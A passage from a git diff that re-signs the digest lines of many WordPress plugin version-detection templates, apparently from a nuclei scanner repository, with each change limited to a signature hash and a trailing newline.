4a0a004730450221009bf4ffb7c7738c91a820764109cff1231b2abb38495c5fb0829609b16ab46a7902203e143a2354d9d2fd616d419cb1ed3a047b2d1dc11c89d1740e8003934ca58d22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fd422830b9c7cc5b93e89b8092c6f4750fd80a7c0a0faece6a1a9a744f2fdb5022036bbd0ebc90a9b57fb1bfa3a6889037e36992c286b033978f700cb196e8ace47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index ec58459c1d..41d04b14ca 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220592dc6bf9e9838351c914f1cd9f0e0e92a2eea6b9656c4b78aa1b003166cc34202205fbec1fd6327568f36faec12986618ca3a807d77c90fa9cae03151548c17eb04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfe0d6a3ff5f3701ed81d01a82bef3bc1fe04d7d3985d708037637c2a2cc8b10022017aea03847fde9cf196645077c3c5f7b8e355f596580ffec146599349274a1ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 7b67751597..c58d696f51 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220536eefa216266d99fb5eeb8a57663995a8ee91e115839900993db07bf987c814022016efda6657ae0094c19cbf237f8d59c86238537b1cbca708655c86e27c380b1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205bd4a9eb401bfa69ef6c0de871f94426b52b7cad7def8bec826553f0a9b4996a02202da48fcee5d162ebb8cf365d7fbb8559b88f8ee3b34525335507331db2fa954f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 79bb0c4ed8..2cf8410f30 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f17343b40c6e9321ba6a51f238ccf3d242babbf47f3537a57fa40aabaec43993022100e8f60018176ba62a5f5e3cc421344746666953595dff5cd0ff5e57bea315211c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb1f000b1522027269e6c0c7dee3470c3e29c7c4cfb89f313fe4fd57b29904bc022100803742842ccc84b2f7ec1f2a61e662d49d039a841a5e3ae16110d692240e4c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 35252f792a..573219d459 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022048e4d269f3f360f72a7606ace41ad2956020f32a7bc6f6ebdffc2d5c6076142802210089766b9385f3da89ed21e8440df04d02aef0f207a17dc8986f6972b91b9d9289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220209a12bbae9f6d7254f41be551825b8a504cfbce258093e9c06d67df231bb49e022052854f10362cb4fd413c7c4939640e01e3af63557c05c535a7fcb99e6656cf76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 16df9ac056..9315c90ef4 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c3e369e62871ce407cc435334f273f969a462f49419ac18b61575d02c7c147d10220126a688c4c7134940808087ab8c736cc2b7c15d8b78606b4a7d3eec511e1a67e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d5da30e3f35b49a3de9c6874184e61f8e8403a5011cbf5f054b582787d131dc702201e4d493e42dbdc2118d966397e6d96a7a0ed3e586f61327eca066e24e3f0e209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index f80ad52d18..0e076bdcec 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203ff2f94869e2d71404d7b6b21173f0101cdcacc7111ef071174839007389d4cb022051eb3bb546b1338c00e01fc72121a651f5290bf448f7186cf0d34459638dbb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207fb0b5fb8eef3c8967042fe8ef418d84fc5fd8858fc1702fbfb1f620baf7f99602203f2ce5c0dff05f1e4e857bcf459ecb767ed26ae6840b545360af4a9e89d3378c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 45f78a057d..16053ffae5 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008df933da120aa14f7f2997875c3f8311fa1d1cdb2f36d3cbff459d4bc70be6420221009b95191740be22b88a0af6fcec549ff73229b8229241248cd6a683af3bf3c00b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fef15ed655d340201353367296398ab7395d3b37783671de98219c6d19592a060220036cbfdb68dbc9f1e4a99b367e7ca979c4baf501f144caa56a6357229ff323ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index d78f12f619..9bd388701d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022078de628675b3d1b0b81ddde48637dcb73b3e0ffa3ad495709e0236a6f377b3dc022100f0e3fa6027cefd8aa0d6467f0ba7f09a9be53ea954e80af9360d7aa5d321f9bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a23ddc8902cd452c648bc1e7c47deee54505e3e76c64b2b4f308bea6f58cb29e022024b764cf55c23186e32eab2dbdee0312744da6f634ba8b64d778eee36f4e2fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 5262069bc6..802a4961b4 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d87c6f91e98a45badffe40c2c1155d0995ce10f05f32b11cd006f5c16188fe9b022100ade3383e727230301672bcc8c1ed3b6fe152e55694a472f1b90d2b099fbae87b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203cfde87bbaba7366bc1db13bbd8bd11b544308aec93cce7b7fc3e69999aefc6302210085abd4dc8bceed129a9c6b2cbc221624a47a0650a44ef22b04863e76735acdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 93498ed542..a3eaa7fb99 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220614a4876aeb38e01d612cfb074bc2b76b636b64e8f1f018b754732c100e44c5d022100918457c7b5acd6bf3ebec1cd75c6e61fed8670a247e37034a2099a51336deb3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085f1ad130153c3faba29a7e55f5864b35bf4291117c9a6ad3da6e997e6b921070221009e699b2ffa76bdcbd8a8835d9a6e3328dc25252bffdf7da479bfdbe18bf8a034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ce564ad6f4..2c4762fbf5 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f7991e6940015f1ce0a0f164b18e18ae44524268cbd3a915d0fb52d540537ef4022100ade5b29ed8f493e88b5aa65c4e3fe9654dd3f63cd5621b246c3a7970f5b4dffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fc59aa964220a67d40915f0ae133272e8990e06e6cc315ae9e8c56ea80f53b7022038b0278016703b3e772e80db3430f1adeba3a085ff7c25c572b247900ca2fc72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 69a0680e6b..006db715dc 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022056e11da41a5ff56e3bd28ab23fe565d7cc166c64b9b2c650a0b3b940146277db02203d8f73c2183a640b1dacac4299696ae4257ecda684f9f8b65d46661322bd1eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200aa2335e93080c3414d7b36953bfe0479db6dace311ccdf545e8c87b055c5b4d022100b30fba4cfd02b4f0bb5d787a269907241b62fbcb88373b154d969e9c6c71eba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 9f823a00de..b9df7822f1 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202ac5cdb42700e002dfbb46acb1cb069d371cda8832424d50341d36517f2710c3022100ca2e00f38218c2d899b1d95fdeb9ff716139e79c80b74f1f5d9877b79943f5b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220033dc6982764c4943157467651817a091a1159cc094c6ca86a3e720075e8644702203005e976eb4c1a4b6c70e7ad0ca46a612c9cdb51655a70a672c5ceab8e3184c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index d9fa86a974..da8a3008b9 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009b9244e3d27aedffcf7c2459be9da5c5717f5e5c13471950aa2ffc7041d4a1ef022100f079bd9e1bfd8d2c80e12f77bb520fcdb19186e79b481ffc81ce05914e287fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf65da991c4d51e46f681c891f6ea7958f202ecdf001f2c8e424c70035fee5cc0220563c9084eb5b515590b520d367f017d1647f17cc7be8657ce1903ab5e4b22b81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 7488cf89c2..a2d84016f3 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009ce5b29724b7f3dd5319528ba4f3b6543d2485910a15230487367932de256c0d022100ea48848669ced43aadf8369e7c46120823cbcd5846b0109a196fa690852448aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201785f9662888b40a53e3577ee344b75e2fbadc77ee57071cd85cd86fecfce1b602200f1981690a8213ee9f2824fd4f16745d12c421ce5dc2d8c1d31dddce27878aed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 29d21a3fcb..2795e70422 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dc8cf8e2d7a01b7bb4c8f95e571e356482d2176f00a3e5b68854e5a752d7de9c02207396b8b3f2d1db6ad31d91dabea5b54a02a483fb4b9c5493904cf5964ce647f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205cbc015a2d023489fd2d8bd48a2c8638b9fea064d2a53ef91cd55c466db2206b022100a7b95670df8facfb5801ed3a80c6279ea26876fae1974a53c218f6f3e0697797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 8999581fed..bce2595e80 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203fb39f77d758d351b488c2c5e256fb3956f0f54d5e32caa6a2ba611b1a2c8132022100e8677cef31e6897f5ab1f09bff2e81ce908317e738bb63ce825defff58428634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038dbd3c322d0931ccfe3a1a746fd1a1a2ac6487d8b0e364912fa92f43908e823022046f4d7b122b3e44eec8d1058ba0904bcfb3aca1f6277e388446b484bbf1c0219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d2d98fd77e..e3c9a19d03 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022022c5428ae0b44092b739c352b5a649591d132dae8401a1c0240a78a68ca0260d02207ee45ca3dea66d8214d15a7271465b06ea1090752cee1ac96d6f2810505d00c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100add81d775095e5956ae88553e5232ed614368f36410b289794ca8c1412c94e3d022100c92dd77e3247c9c2257855fa2cc2cae0a7c96bf7719ee21c59fdabf2b1ca8e04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 9f2d16f836..2836cc49ca 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203a4efac0182651e475a0ab3689354c44a44b74352237c9fc65cb8f2079aa5d7602206d122564c45f87e24eb4d7f8f2233d7bea057be3f727aa9f7d68f5e4fa61d966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a9c344fa04188fbd388cd8bbde64a4fedd0f5d859e7ffb628253423b8f54ff202201741fae2aced31f1b485cba274b52aa6f2aa2dffe02fa7238990cb5858d8b84f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index a5f8e0438c..3202b88bf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ebc8d5e4344e136e2ff395b94f904d9ac938747f72948e5a77c9358fcfdb77f5022100ba61d6d1932c6ed2d52f90d0632fdad3e68b486f344cfdd02b03666fe72e39a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055fb30c3bb3df0a082b13346986dcf2c25478f647e09f4921b90be97e08e3aa8022100efd27836c8338ae011853f1b71df11664706e2ec4350ede86e172d274f7a0766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 03fcfacc4d..d143504f2b 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204a811efe78a9728b957aea8d9f4272042f9176df724f62d2cd2cb5fad14bab6302204efa792bbacfdb8ee4faa53563284ad15e1d8e40d111f4d1a8cd9236263251a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220588ed3f01b5528e59c075cec8cd5cdc2a41481bccfc76e2db3071ec87ad0bb8e022100f7307676aa1238601b78165c7dccd578618a5c1ba4c03899802e304441f9bcf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b1cdb8cfb5..7abf1727a7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008d35cb1162fa1584ace20bb73798e2e16a215c4d9779c3841e6d621db2eba42e022100f939c3f91144b2197fa6155e661936b97a97c140c61b30c5f6f2c31d4e7a252c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054cef6c1f25cdc9f02fb028daa4854fc542d9f53f44b7014070e5de8e6239e84022010b734309147c28a158894f1bf7e26d558c0de945bfb927eb0867c878294f3a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 9946126575..ee276daae9 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c63f6c090926d207bb7f5acfaed59cd70113f84f14f418c3cb32a3aaf70716ca02202a790118a4180c5eb55ceb4ce9783d3ea5aae90774d857b0e09475a0985f0c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5f9e540b131826192e36422f96a4087b969397a0d88f3215ff7bd779c3252f302203002a4317360de84c793d8d117a24fe68a527e0f5e7a9b0ac108e569f255e41e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 7d82f56a77..0f6edddb27 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d50254a8dc64d990b1c9b1842ca1db21bd629ea02d4d9ad72491a07e04c8cdd2022100c34347ee7de71f7a9b92da80d9ecf435378ead1b49ffed917c852e850f368900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b6b255df911f1b7dfff4870fb35484e5c81fbc84f5dc58e94ab0cd499bb4935022100a80c974308cbf36bb53033b38fde066c7fc5cc432511a3d847ff4edb3b6e05c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 4c7f1bcf7e..d806003a20 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022050ed562350bca3f994c2bd4bdab500ac7ee2d214dabf743f0494eca28b54a794022100f78f8bc6960459fdf67eb0058a1e4d0575527d6ae8f7334d5d5943b9e98ba873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c6875615104c09204e1ca1be15ed9c8cdcbfc37fcead8b28961e8c0a09110db702206747c619526e4560f22433ef8502d49f21a2dd4cc3ced15e74d9a478b2889b99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 8ecfff3b3a..1d4be7b663 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100965ea2acde1268781191f48a2bcfa231cfd8a18db51fc614a82e23cb2861747f022100a9bbf2d309257171df14170329f32809e5a15822ff2771fa3b1762ec71ddd6f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e0f9af08d821eb35ceb5c9c13e4105788c1d1e60bda1eb26413e6f1b1dc94fe022100d7d66dacf49f90ddfc7454839bc2b05928cd0c296f4cea84686802b625daedc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index c27a3c3d51..6ff23211d2 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008b6a4ce67faeb5552cdfb6d03fcc37e58488977823894974277b56118c7310e402202438e0c292d867ee9eef3cc465302b6c5676001e0a78860576fe52626e1ff0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220021b3ed069b818d2c32d4f4351adf7dd8bdb44660c43b43e1e59611e20d8ab0d022100f65221500a111504a8261955bbdbde6c4c2fb40f0f30b0e84a06abd5f5b358da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 0dde76be4e..e1bdb5cbf9 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022038f557eb75121bf0c2ca336abbfab0dd86c2d883489e6118d5d307532facaaef022100e0549342258f7fa97c4a8f7562bcfc3585c6f0f0a70e87afb413c4715e5b085e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b37edf2d368c536f4661f527daa967eb1c8e0a916e7b9f1b26adf883ebe2aebb022100f1d8d6f5c111c0ec8690b02e2095fd1476c7aa299e0d375e5c8a70ebd2139d7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 3f56db3880..5e4d02a70c 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b7e836acbb8db25af1c3557576a1bd1948934c3fd5a9bcaf03ce054a10b20ebe022100fb3c782f00ce58d4afb60d21d4c1d1bd4c0827a31751929c0ae7188306121501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d220de48186d9d5f8308d671f171fec4631480ee4fc68e2023e903d9e70f913f022100b8bb9cc6e500d245933b4883655527333e50a0ac45b9a4f2b6b98e3930df82d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 4ffd28a42a..af9d3a883f 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220159e80cd03382f05cd9a817978f3e89a0b33e8dbde1a1eda693e37a4716e4ae6022078fc99c4cdbc0ef203eaba5ec96b2faee1b3953de6d043122acd5c9380856256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220748c3cbd7e05b796ac6a9a19f0fffc536cd3b85be8342681dca5aaddce0499e2022100d4337f8f39e696f1283e75b3a16aa0351f189923f33f5fe5de006aa4e8a711df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 0b9d0ca699..a5a511c412 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202f537fe6ff622204473f3a4cadc664f90c0835b6202631ca1b7f7ac49c5d4485022100bcd4a1573d75458b3d2dacdb10abb7fa13c2c2ccc6d2a95b0fc7667e1e05350f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070e3d0f5f9eeb5fed3f8cb2e8cdf1907df5cc6707387d14adb8c869d14f4c18902204eb1f9f014b007ac54cc7a7d7fcf0465efc4e515db8a337c98635521b3809748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 3cb8e2d512..220569150c 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201faf5b335711fa7e469870f640de1a464d631ee2e5f3b9051f8ff6d12c3130be02202b6d9480469cc2d06bb262b2886c4bd1e6625dd4a1cb9360787f83a37d58c16a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100888dc25eef876b931e8ce44d90b19dec081f38b4fc48444299334741f7993480022100e4b26c7e16b8b0e84e8256b7546e2ae9591d2941fbe97624a07d9044607dc48a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index ccd00717f0..0efd6061e5 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ec5ef3a82b7db6fe1995d3e6bae1899a023da98c5b9ea882d404e8ce8aeed33002203737c877f167d0a45351715d7025fa71e41643db618c8840de3faf8cae7c41de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 